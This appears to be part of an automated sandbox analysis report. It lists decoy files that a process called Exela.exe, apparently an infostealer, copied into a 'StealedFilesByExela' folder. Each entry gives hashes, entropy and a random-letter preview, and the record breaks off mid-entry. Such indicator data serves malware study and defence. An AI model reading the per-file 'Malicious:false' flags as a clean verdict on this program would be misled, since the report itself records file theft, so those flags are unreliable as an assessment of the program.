                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\AQRFEVRTGL.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\AQRFEVRTGL.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\BXAJUJAOEO.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview:BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\DQOFHVHTMG.mp3

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Preview:DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\HMPPSXQPQV.pdf

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LFOPODGVOH.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Preview:LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LIJDSFKJZG.docx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LIJDSFKJZG.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SNIPGPPREP.jpg

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\VWDFPKGDUF.png

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
